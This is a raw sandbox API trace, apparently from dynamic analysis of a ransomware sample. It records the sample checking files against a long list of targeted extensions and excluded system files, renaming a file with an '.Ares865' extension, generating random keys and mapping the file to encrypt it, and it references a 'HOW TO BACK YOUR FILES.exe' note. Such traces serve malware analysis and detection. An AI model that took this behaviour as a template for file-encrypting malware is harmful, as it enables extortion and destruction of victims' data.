(lpString1="bmp", lpString2="p96") returned -1 [0084.570] lstrlenW (lpString="p97") returned 3 [0084.570] lstrcmpiW (lpString1="bmp", lpString2="p97") returned -1 [0084.570] lstrlenW (lpString="pan") returned 3 [0084.570] lstrcmpiW (lpString1="bmp", lpString2="pan") returned -1 [0084.570] lstrlenW (lpString="pdb") returned 3 [0084.570] lstrcmpiW (lpString1="bmp", lpString2="pdb") returned -1 [0084.570] lstrlenW (lpString="pdm") returned 3 [0084.570] lstrcmpiW (lpString1="bmp", lpString2="pdm") returned -1 [0084.570] lstrlenW (lpString="pnz") returned 3 [0084.570] lstrcmpiW (lpString1="bmp", lpString2="pnz") returned -1 [0084.570] lstrlenW (lpString="qry") returned 3 [0084.570] lstrcmpiW (lpString1="bmp", lpString2="qry") returned -1 [0084.570] lstrlenW (lpString="qvd") returned 3 [0084.570] lstrcmpiW (lpString1="bmp", lpString2="qvd") returned -1 [0084.570] lstrlenW (lpString="rbf") returned 3 [0084.570] lstrcmpiW (lpString1="bmp", lpString2="rbf") returned -1 [0084.570] lstrlenW (lpString="rctd") returned 4 [0084.570] lstrcmpiW (lpString1=".bmp", lpString2="rctd") returned -1 [0084.570] lstrlenW (lpString="rod") returned 3 [0084.571] lstrcmpiW (lpString1="bmp", lpString2="rod") returned -1 [0084.571] lstrlenW (lpString="rodx") returned 4 [0084.571] lstrcmpiW (lpString1=".bmp", lpString2="rodx") returned -1 [0084.571] lstrlenW (lpString="rpd") returned 3 [0084.571] lstrcmpiW (lpString1="bmp", lpString2="rpd") returned -1 [0084.571] lstrlenW (lpString="rsd") returned 3 [0084.571] lstrcmpiW (lpString1="bmp", lpString2="rsd") returned -1 [0084.571] lstrlenW (lpString="sas7bdat") returned 8 [0084.571] lstrcmpiW (lpString1="uest.bmp", lpString2="sas7bdat") returned 1 [0084.571] lstrlenW (lpString="sbf") returned 3 [0084.571] lstrcmpiW (lpString1="bmp", lpString2="sbf") returned -1 [0084.571] lstrlenW (lpString="scx") returned 3 [0084.571] lstrcmpiW (lpString1="bmp", lpString2="scx") returned -1 [0084.571] lstrlenW (lpString="sdb") returned 3 [0084.571] lstrcmpiW (lpString1="bmp", lpString2="sdb") returned -1 [0084.571] lstrlenW (lpString="sdc") returned 3 [0084.571] lstrcmpiW (lpString1="bmp", lpString2="sdc") returned -1 [0084.571] lstrlenW (lpString="sdf") returned 3 [0084.571] lstrcmpiW (lpString1="bmp", lpString2="sdf") returned -1 [0084.571] lstrlenW (lpString="sis") returned 3 [0084.571] lstrcmpiW (lpString1="bmp", lpString2="sis") returned -1 [0084.571] lstrlenW (lpString="spq") returned 3 [0084.571] lstrcmpiW (lpString1="bmp", lpString2="spq") returned -1 [0084.571] lstrlenW (lpString="te") returned 2 [0084.571] lstrcmpiW (lpString1="mp", lpString2="te") returned -1 [0084.571] lstrlenW (lpString="teacher") returned 7 [0084.571] lstrcmpiW (lpString1="est.bmp", lpString2="teacher") returned -1 [0084.571] lstrlenW (lpString="tmd") returned 3 [0084.571] lstrcmpiW (lpString1="bmp", lpString2="tmd") returned -1 [0084.571] lstrlenW (lpString="tps") returned 3 [0084.571] lstrcmpiW (lpString1="bmp", lpString2="tps") returned -1 [0084.571] lstrlenW (lpString="trc") returned 3 [0084.571] lstrcmpiW (lpString1="bmp", lpString2="trc") returned -1 [0084.571] lstrlenW (lpString="trc") returned 3 [0084.571] lstrcmpiW (lpString1="bmp", lpString2="trc") returned -1 [0084.572] lstrlenW (lpString="trm") returned 3 [0084.572] lstrcmpiW (lpString1="bmp", lpString2="trm") returned -1 [0084.572] lstrlenW (lpString="udb") returned 3 [0084.572] lstrcmpiW (lpString1="bmp", lpString2="udb") returned -1 [0084.572] lstrlenW (lpString="udl") returned 3 [0084.572] lstrcmpiW (lpString1="bmp", lpString2="udl") returned -1 [0084.572] lstrlenW (lpString="usr") returned 3 [0084.572] lstrcmpiW (lpString1="bmp", lpString2="usr") returned -1 [0084.572] lstrlenW (lpString="v12") returned 3 [0084.572] lstrcmpiW (lpString1="bmp", lpString2="v12") returned -1 [0084.572] lstrlenW (lpString="vis") returned 3 [0084.572] lstrcmpiW (lpString1="bmp", lpString2="vis") returned -1 [0084.572] lstrlenW (lpString="vpd") returned 3 [0084.572] lstrcmpiW (lpString1="bmp", lpString2="vpd") returned -1 [0084.572] lstrlenW (lpString="vvv") returned 3 [0084.572] lstrcmpiW (lpString1="bmp", lpString2="vvv") returned -1 [0084.572] lstrlenW (lpString="wdb") returned 3 [0084.572] lstrcmpiW (lpString1="bmp", lpString2="wdb") returned -1 [0084.572] lstrlenW (lpString="wmdb") returned 4 [0084.572] lstrcmpiW (lpString1=".bmp", lpString2="wmdb") returned -1 [0084.572] lstrlenW (lpString="wrk") returned 3 [0084.572] lstrcmpiW (lpString1="bmp", lpString2="wrk") returned -1 [0084.572] lstrlenW (lpString="xdb") returned 3 [0084.572] lstrcmpiW (lpString1="bmp", lpString2="xdb") returned -1 [0084.572] lstrlenW (lpString="xld") returned 3 [0084.572] lstrcmpiW (lpString1="bmp", lpString2="xld") returned -1 [0084.572] lstrlenW (lpString="xmlff") returned 5 [0084.572] lstrcmpiW (lpString1="t.bmp", lpString2="xmlff") returned -1 [0084.572] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\guest.bmp.Ares865") returned 68 [0084.572] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\guest.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\guest.bmp"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\guest.bmp.Ares865" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\guest.bmp.ares865"), dwFlags=0x1) returned 1 [0084.573] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\guest.bmp.Ares865" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\guest.bmp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0084.574] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=49208) returned 1 [0084.574] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0084.574] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0084.574] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0084.574] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0084.575] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0084.575] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0084.575] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xc340, lpName=0x0) returned 0x15c [0084.584] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc340) returned 0x190000 [0084.592] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0084.593] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0084.593] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0084.593] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0084.593] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0084.593] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0084.593] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0084.593] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0084.593] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0084.593] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0084.593] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0084.593] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0084.593] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0084.593] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0084.594] CloseHandle (hObject=0x15c) returned 1 [0084.594] CloseHandle (hObject=0x118) returned 1 [0084.594] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0084.594] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0084.594] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0084.594] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c52b0c0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c52b0c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0084.594] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0084.594] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7bed1018, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7bed1018, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="user.bmp", cAlternateFileName="")) returned 1 [0084.594] lstrcmpiW (lpString1="user.bmp", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0084.595] lstrcmpiW (lpString1="user.bmp", lpString2="aoldtz.exe") returned 1 [0084.595] lstrcmpiW (lpString1="user.bmp", lpString2=".") returned 1 [0084.595] lstrcmpiW (lpString1="user.bmp", lpString2="..") returned 1 [0084.595] lstrcmpiW (lpString1="user.bmp", lpString2="windows") returned -1 [0084.595] lstrcmpiW (lpString1="user.bmp", lpString2="bootmgr") returned 1 [0084.595] lstrcmpiW (lpString1="user.bmp", lpString2="temp") returned 1 [0084.595] lstrcmpiW (lpString1="user.bmp", lpString2="pagefile.sys") returned 1 [0084.595] lstrcmpiW (lpString1="user.bmp", lpString2="boot") returned 1 [0084.595] lstrcmpiW (lpString1="user.bmp", lpString2="ids.txt") returned 1 [0084.595] lstrcmpiW (lpString1="user.bmp", lpString2="ntuser.dat") returned 1 [0084.595] lstrcmpiW (lpString1="user.bmp", lpString2="perflogs") returned 1 [0084.595] lstrcmpiW (lpString1="user.bmp", lpString2="MSBuild") returned 1 [0084.595] lstrlenW (lpString="user.bmp") returned 8 [0084.595] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\guest.bmp") returned 60 [0084.595] lstrcpyW (in: lpString1=0x2cce466, lpString2="user.bmp" | out: lpString1="user.bmp") returned="user.bmp" [0084.595] lstrlenW (lpString="user.bmp") returned 8 [0084.595] lstrlenW (lpString="Ares865") returned 7 [0084.595] lstrcmpiW (lpString1="ser.bmp", lpString2="Ares865") returned 1 [0084.595] lstrlenW (lpString=".dll") returned 4 [0084.595] lstrcmpiW (lpString1="user.bmp", lpString2=".dll") returned 1 [0084.595] lstrlenW (lpString=".lnk") returned 4 [0084.595] lstrcmpiW (lpString1="user.bmp", lpString2=".lnk") returned 1 [0084.595] lstrlenW (lpString=".ini") returned 4 [0084.595] lstrcmpiW (lpString1="user.bmp", lpString2=".ini") returned 1 [0084.595] lstrlenW (lpString=".sys") returned 4 [0084.595] lstrcmpiW (lpString1="user.bmp", lpString2=".sys") returned 1 [0084.595] lstrlenW (lpString="user.bmp") returned 8 [0084.595] lstrlenW (lpString="bak") returned 3 [0084.595] lstrcmpiW (lpString1="bmp", lpString2="bak") returned 1 [0084.595] lstrlenW (lpString="ba_") returned 3 [0084.595] lstrcmpiW (lpString1="bmp", lpString2="ba_") returned 1 [0084.595] lstrlenW (lpString="dbb") returned 3 [0084.595] lstrcmpiW (lpString1="bmp", lpString2="dbb") returned -1 [0084.595] lstrlenW (lpString="vmdk") returned 4 [0084.595] lstrcmpiW (lpString1=".bmp", lpString2="vmdk") returned -1 [0084.595] lstrlenW (lpString="rar") returned 3 [0084.596] lstrcmpiW (lpString1="bmp", lpString2="rar") returned -1 [0084.596] lstrlenW (lpString="zip") returned 3 [0084.596] lstrcmpiW (lpString1="bmp", lpString2="zip") returned -1 [0084.596] lstrlenW (lpString="tgz") returned 3 [0084.596] lstrcmpiW (lpString1="bmp", lpString2="tgz") returned -1 [0084.596] lstrlenW (lpString="vbox") returned 4 [0084.596] lstrcmpiW (lpString1=".bmp", lpString2="vbox") returned -1 [0084.596] lstrlenW (lpString="vdi") returned 3 [0084.596] lstrcmpiW (lpString1="bmp", lpString2="vdi") returned -1 [0084.596] lstrlenW (lpString="vhd") returned 3 [0084.596] lstrcmpiW (lpString1="bmp", lpString2="vhd") returned -1 [0084.596] lstrlenW (lpString="vhdx") returned 4 [0084.596] lstrcmpiW (lpString1=".bmp", lpString2="vhdx") returned -1 [0084.596] lstrlenW (lpString="avhd") returned 4 [0084.596] lstrcmpiW (lpString1=".bmp", lpString2="avhd") returned -1 [0084.596] lstrlenW (lpString="db") returned 2 [0084.596] lstrcmpiW (lpString1="mp", lpString2="db") returned 1 [0084.596] lstrlenW (lpString="db2") returned 3 [0084.596] lstrcmpiW (lpString1="bmp", lpString2="db2") returned -1 [0084.596] lstrlenW (lpString="db3") returned 3 [0084.596] lstrcmpiW (lpString1="bmp", lpString2="db3") returned -1 [0084.596] lstrlenW (lpString="dbf") returned 3 [0084.596] lstrcmpiW (lpString1="bmp", lpString2="dbf") returned -1 [0084.596] lstrlenW (lpString="mdf") returned 3 [0084.596] lstrcmpiW (lpString1="bmp", lpString2="mdf") returned -1 [0084.596] lstrlenW (lpString="mdb") returned 3 [0084.596] lstrcmpiW (lpString1="bmp", lpString2="mdb") returned -1 [0084.596] lstrlenW (lpString="sql") returned 3 [0084.596] lstrcmpiW (lpString1="bmp", lpString2="sql") returned -1 [0084.596] lstrlenW (lpString="sqlite") returned 6 [0084.596] lstrcmpiW (lpString1="er.bmp", lpString2="sqlite") returned -1 [0084.596] lstrlenW (lpString="sqlite3") returned 7 [0084.596] lstrcmpiW (lpString1="ser.bmp", lpString2="sqlite3") returned -1 [0084.596] lstrlenW (lpString="sqlitedb") returned 8 [0084.596] lstrlenW (lpString="xml") returned 3 [0084.596] lstrcmpiW (lpString1="bmp", lpString2="xml") returned -1 [0084.596] lstrlenW (lpString="$er") returned 3 [0084.597] lstrcmpiW (lpString1="bmp", lpString2="$er") returned 1 [0084.597] lstrlenW (lpString="4dd") returned 3 [0084.597] lstrcmpiW (lpString1="bmp", lpString2="4dd") returned 1 [0084.597] lstrlenW (lpString="4dl") returned 3 [0084.597] lstrcmpiW (lpString1="bmp", lpString2="4dl") returned 1 [0084.597] lstrlenW (lpString="^^^") returned 3 [0084.597] lstrcmpiW (lpString1="bmp", lpString2="^^^") returned 1 [0084.597] lstrlenW (lpString="abs") returned 3 [0084.597] lstrcmpiW (lpString1="bmp", lpString2="abs") returned 1 [0084.597] lstrlenW (lpString="abx") returned 3 [0084.597] lstrcmpiW (lpString1="bmp", lpString2="abx") returned 1 [0084.597] lstrlenW (lpString="accdb") returned 5 [0084.597] lstrcmpiW (lpString1="r.bmp", lpString2="accdb") returned 1 [0084.597] lstrlenW (lpString="accdc") returned 5 [0084.597] lstrcmpiW (lpString1="r.bmp", lpString2="accdc") returned 1 [0084.597] lstrlenW (lpString="accde") returned 5 [0084.597] lstrcmpiW (lpString1="r.bmp", lpString2="accde") returned 1 [0084.597] lstrlenW (lpString="accdr") returned 5 [0084.597] lstrcmpiW (lpString1="r.bmp", lpString2="accdr") returned 1 [0084.597] lstrlenW (lpString="accdt") returned 5 [0084.597] lstrcmpiW (lpString1="r.bmp", lpString2="accdt") returned 1 [0084.597] lstrlenW (lpString="accdw") returned 5 [0084.597] lstrcmpiW (lpString1="r.bmp", lpString2="accdw") returned 1 [0084.597] lstrlenW (lpString="accft") returned 5 [0084.597] lstrcmpiW (lpString1="r.bmp", lpString2="accft") returned 1 [0084.597] lstrlenW (lpString="adb") returned 3 [0084.597] lstrcmpiW (lpString1="bmp", lpString2="adb") returned 1 [0084.597] lstrlenW (lpString="adb") returned 3 [0084.597] lstrcmpiW (lpString1="bmp", lpString2="adb") returned 1 [0084.597] lstrlenW (lpString="ade") returned 3 [0084.597] lstrcmpiW (lpString1="bmp", lpString2="ade") returned 1 [0084.597] lstrlenW (lpString="adf") returned 3 [0084.597] lstrcmpiW (lpString1="bmp", lpString2="adf") returned 1 [0084.597] lstrlenW (lpString="adn") returned 3 [0084.597] lstrcmpiW (lpString1="bmp", lpString2="adn") returned 1 [0084.597] lstrlenW (lpString="adp") returned 3 [0084.597] lstrcmpiW (lpString1="bmp", lpString2="adp") returned 1 [0084.597] lstrlenW (lpString="alf") returned 3 [0084.598] lstrcmpiW (lpString1="bmp", lpString2="alf") returned 1 [0084.598] lstrlenW (lpString="ask") returned 3 [0084.598] lstrcmpiW (lpString1="bmp", lpString2="ask") returned 1 [0084.598] lstrlenW (lpString="btr") returned 3 [0084.598] lstrcmpiW (lpString1="bmp", lpString2="btr") returned -1 [0084.598] lstrlenW (lpString="cat") returned 3 [0084.598] lstrcmpiW (lpString1="bmp", lpString2="cat") returned -1 [0084.598] lstrlenW (lpString="cdb") returned 3 [0084.598] lstrcmpiW (lpString1="bmp", lpString2="cdb") returned -1 [0084.598] lstrlenW (lpString="ckp") returned 3 [0084.598] lstrcmpiW (lpString1="bmp", lpString2="ckp") returned -1 [0084.598] lstrlenW (lpString="cma") returned 3 [0084.598] lstrcmpiW (lpString1="bmp", lpString2="cma") returned -1 [0084.598] lstrlenW (lpString="cpd") returned 3 [0084.598] lstrcmpiW (lpString1="bmp", lpString2="cpd") returned -1 [0084.598] lstrlenW (lpString="dacpac") returned 6 [0084.598] lstrcmpiW (lpString1="er.bmp", lpString2="dacpac") returned 1 [0084.598] lstrlenW (lpString="dad") returned 3 [0084.598] lstrcmpiW (lpString1="bmp", lpString2="dad") returned -1 [0084.598] lstrlenW (lpString="dadiagrams") returned 10 [0084.598] lstrlenW (lpString="daschema") returned 8 [0084.598] lstrlenW (lpString="db-journal") returned 10 [0084.598] lstrlenW (lpString="db-shm") returned 6 [0084.598] lstrcmpiW (lpString1="er.bmp", lpString2="db-shm") returned 1 [0084.598] lstrlenW (lpString="db-wal") returned 6 [0084.598] lstrcmpiW (lpString1="er.bmp", lpString2="db-wal") returned 1 [0084.598] lstrlenW (lpString="dbc") returned 3 [0084.598] lstrcmpiW (lpString1="bmp", lpString2="dbc") returned -1 [0084.598] lstrlenW (lpString="dbs") returned 3 [0084.598] lstrcmpiW (lpString1="bmp", lpString2="dbs") returned -1 [0084.598] lstrlenW (lpString="dbt") returned 3 [0084.598] lstrcmpiW (lpString1="bmp", lpString2="dbt") returned -1 [0084.598] lstrlenW (lpString="dbv") returned 3 [0084.598] lstrcmpiW (lpString1="bmp", lpString2="dbv") returned -1 [0084.598] lstrlenW (lpString="dbx") returned 3 [0084.598] lstrcmpiW (lpString1="bmp", lpString2="dbx") returned -1 [0084.598] lstrlenW (lpString="dcb") returned 3 [0084.599] lstrcmpiW (lpString1="bmp", lpString2="dcb") returned -1 [0084.599] lstrlenW (lpString="dct") returned 3 [0084.599] lstrcmpiW (lpString1="bmp", lpString2="dct") returned -1 [0084.599] lstrlenW (lpString="dcx") returned 3 [0084.599] lstrcmpiW (lpString1="bmp", lpString2="dcx") returned -1 [0084.599] lstrlenW (lpString="ddl") returned 3 [0084.599] lstrcmpiW (lpString1="bmp", lpString2="ddl") returned -1 [0084.599] lstrlenW (lpString="dlis") returned 4 [0084.599] lstrcmpiW (lpString1=".bmp", lpString2="dlis") returned -1 [0084.599] lstrlenW (lpString="dp1") returned 3 [0084.599] lstrcmpiW (lpString1="bmp", lpString2="dp1") returned -1 [0084.599] lstrlenW (lpString="dqy") returned 3 [0084.599] lstrcmpiW (lpString1="bmp", lpString2="dqy") returned -1 [0084.599] lstrlenW (lpString="dsk") returned 3 [0084.599] lstrcmpiW (lpString1="bmp", lpString2="dsk") returned -1 [0084.599] lstrlenW (lpString="dsn") returned 3 [0084.599] lstrcmpiW (lpString1="bmp", lpString2="dsn") returned -1 [0084.599] lstrlenW (lpString="dtsx") returned 4 [0084.599] lstrcmpiW (lpString1=".bmp", lpString2="dtsx") returned -1 [0084.599] lstrlenW (lpString="dxl") returned 3 [0084.599] lstrcmpiW (lpString1="bmp", lpString2="dxl") returned -1 [0084.599] lstrlenW (lpString="eco") returned 3 [0084.599] lstrcmpiW (lpString1="bmp", lpString2="eco") returned -1 [0084.599] lstrlenW (lpString="ecx") returned 3 [0084.599] lstrcmpiW (lpString1="bmp", lpString2="ecx") returned -1 [0084.599] lstrlenW (lpString="edb") returned 3 [0084.599] lstrcmpiW (lpString1="bmp", lpString2="edb") returned -1 [0084.599] lstrlenW (lpString="epim") returned 4 [0084.599] lstrcmpiW (lpString1=".bmp", lpString2="epim") returned -1 [0084.599] lstrlenW (lpString="fcd") returned 3 [0084.599] lstrcmpiW (lpString1="bmp", lpString2="fcd") returned -1 [0084.599] lstrlenW (lpString="fdb") returned 3 [0084.599] lstrcmpiW (lpString1="bmp", lpString2="fdb") returned -1 [0084.599] lstrlenW (lpString="fic") returned 3 [0084.599] lstrcmpiW (lpString1="bmp", lpString2="fic") returned -1 [0084.599] lstrlenW (lpString="flexolibrary") returned 12 [0084.599] lstrlenW (lpString="fm5") returned 3 [0084.600] lstrcmpiW (lpString1="bmp", lpString2="fm5") returned -1 [0084.600] lstrlenW (lpString="fmp") returned 3 [0084.600] lstrcmpiW (lpString1="bmp", lpString2="fmp") returned -1 [0084.600] lstrlenW (lpString="fmp12") returned 5 [0084.600] lstrcmpiW (lpString1="r.bmp", lpString2="fmp12") returned 1 [0084.600] lstrlenW (lpString="fmpsl") returned 5 [0084.600] lstrcmpiW (lpString1="r.bmp", lpString2="fmpsl") returned 1 [0084.600] lstrlenW (lpString="fol") returned 3 [0084.600] lstrcmpiW (lpString1="bmp", lpString2="fol") returned -1 [0084.600] lstrlenW (lpString="fp3") returned 3 [0084.600] lstrcmpiW (lpString1="bmp", lpString2="fp3") returned -1 [0084.600] lstrlenW (lpString="fp4") returned 3 [0084.600] lstrcmpiW (lpString1="bmp", lpString2="fp4") returned -1 [0084.600] lstrlenW (lpString="fp5") returned 3 [0084.600] lstrcmpiW (lpString1="bmp", lpString2="fp5") returned -1 [0084.600] lstrlenW (lpString="fp7") returned 3 [0084.600] lstrcmpiW (lpString1="bmp", lpString2="fp7") returned -1 [0084.600] lstrlenW (lpString="fpt") returned 3 [0084.600] lstrcmpiW (lpString1="bmp", lpString2="fpt") returned -1 [0084.600] lstrlenW (lpString="frm") returned 3 [0084.600] lstrcmpiW (lpString1="bmp", lpString2="frm") returned -1 [0084.600] lstrlenW (lpString="gdb") returned 3 [0084.600] lstrcmpiW (lpString1="bmp", lpString2="gdb") returned -1 [0084.600] lstrlenW (lpString="gdb") returned 3 [0084.600] lstrcmpiW (lpString1="bmp", lpString2="gdb") returned -1 [0084.600] lstrlenW (lpString="grdb") returned 4 [0084.600] lstrcmpiW (lpString1=".bmp", lpString2="grdb") returned -1 [0084.600] lstrlenW (lpString="gwi") returned 3 [0084.600] lstrcmpiW (lpString1="bmp", lpString2="gwi") returned -1 [0084.600] lstrlenW (lpString="hdb") returned 3 [0084.600] lstrcmpiW (lpString1="bmp", lpString2="hdb") returned -1 [0084.600] lstrlenW (lpString="his") returned 3 [0084.600] lstrcmpiW (lpString1="bmp", lpString2="his") returned -1 [0084.600] lstrlenW (lpString="ib") returned 2 [0084.600] lstrcmpiW (lpString1="mp", lpString2="ib") returned 1 [0084.600] lstrlenW (lpString="idb") returned 3 [0084.600] lstrcmpiW (lpString1="bmp", lpString2="idb") returned -1 [0084.601] lstrlenW (lpString="ihx") returned 3 [0084.601] lstrcmpiW (lpString1="bmp", lpString2="ihx") returned -1 [0084.601] lstrlenW (lpString="itdb") returned 4 [0084.601] lstrcmpiW (lpString1=".bmp", lpString2="itdb") returned -1 [0084.601] lstrlenW (lpString="itw") returned 3 [0084.601] lstrcmpiW (lpString1="bmp", lpString2="itw") returned -1 [0084.601] lstrlenW (lpString="jet") returned 3 [0084.601] lstrcmpiW (lpString1="bmp", lpString2="jet") returned -1 [0084.601] lstrlenW (lpString="jtx") returned 3 [0084.601] lstrcmpiW (lpString1="bmp", lpString2="jtx") returned -1 [0084.601] lstrlenW (lpString="kdb") returned 3 [0084.601] lstrcmpiW (lpString1="bmp", lpString2="kdb") returned -1 [0084.601] lstrlenW (lpString="kexi") returned 4 [0084.601] lstrcmpiW (lpString1=".bmp", lpString2="kexi") returned -1 [0084.601] lstrlenW (lpString="kexic") returned 5 [0084.601] lstrcmpiW (lpString1="r.bmp", lpString2="kexic") returned 1 [0084.601] lstrlenW (lpString="kexis") returned 5 [0084.601] lstrcmpiW (lpString1="r.bmp", lpString2="kexis") returned 1 [0084.601] lstrlenW (lpString="lgc") returned 3 [0084.601] lstrcmpiW (lpString1="bmp", lpString2="lgc") returned -1 [0084.601] lstrlenW (lpString="lwx") returned 3 [0084.601] lstrcmpiW (lpString1="bmp", lpString2="lwx") returned -1 [0084.601] lstrlenW (lpString="maf") returned 3 [0084.601] lstrcmpiW (lpString1="bmp", lpString2="maf") returned -1 [0084.601] lstrlenW (lpString="maq") returned 3 [0084.601] lstrcmpiW (lpString1="bmp", lpString2="maq") returned -1 [0084.601] lstrlenW (lpString="mar") returned 3 [0084.601] lstrcmpiW (lpString1="bmp", lpString2="mar") returned -1 [0084.601] lstrlenW (lpString="marshal") returned 7 [0084.601] lstrcmpiW (lpString1="ser.bmp", lpString2="marshal") returned 1 [0084.601] lstrlenW (lpString="mas") returned 3 [0084.601] lstrcmpiW (lpString1="bmp", lpString2="mas") returned -1 [0084.601] lstrlenW (lpString="mav") returned 3 [0084.601] lstrcmpiW (lpString1="bmp", lpString2="mav") returned -1 [0084.601] lstrlenW (lpString="maw") returned 3 [0084.601] lstrcmpiW (lpString1="bmp", lpString2="maw") returned -1 [0084.601] lstrlenW (lpString="mdbhtml") returned 7 [0084.601] lstrcmpiW (lpString1="ser.bmp", lpString2="mdbhtml") returned 1 [0084.602] lstrlenW (lpString="mdn") returned 3 [0084.602] lstrcmpiW (lpString1="bmp", lpString2="mdn") returned -1 [0084.602] lstrlenW (lpString="mdt") returned 3 [0084.602] lstrcmpiW (lpString1="bmp", lpString2="mdt") returned -1 [0084.602] lstrlenW (lpString="mfd") returned 3 [0084.602] lstrcmpiW (lpString1="bmp", lpString2="mfd") returned -1 [0084.602] lstrlenW (lpString="mpd") returned 3 [0084.602] lstrcmpiW (lpString1="bmp", lpString2="mpd") returned -1 [0084.602] lstrlenW (lpString="mrg") returned 3 [0084.602] lstrcmpiW (lpString1="bmp", lpString2="mrg") returned -1 [0084.602] lstrlenW (lpString="mud") returned 3 [0084.602] lstrcmpiW (lpString1="bmp", lpString2="mud") returned -1 [0084.602] lstrlenW (lpString="mwb") returned 3 [0084.602] lstrcmpiW (lpString1="bmp", lpString2="mwb") returned -1 [0084.602] lstrlenW (lpString="myd") returned 3 [0084.602] lstrcmpiW (lpString1="bmp", lpString2="myd") returned -1 [0084.602] lstrlenW (lpString="ndf") returned 3 [0084.602] lstrcmpiW (lpString1="bmp", lpString2="ndf") returned -1 [0084.602] lstrlenW (lpString="nnt") returned 3 [0084.602] lstrcmpiW (lpString1="bmp", lpString2="nnt") returned -1 [0084.602] lstrlenW (lpString="nrmlib") returned 6 [0084.602] lstrcmpiW (lpString1="er.bmp", lpString2="nrmlib") returned -1 [0084.602] lstrlenW (lpString="ns2") returned 3 [0084.602] lstrcmpiW (lpString1="bmp", lpString2="ns2") returned -1 [0084.602] lstrlenW (lpString="ns3") returned 3 [0084.602] lstrcmpiW (lpString1="bmp", lpString2="ns3") returned -1 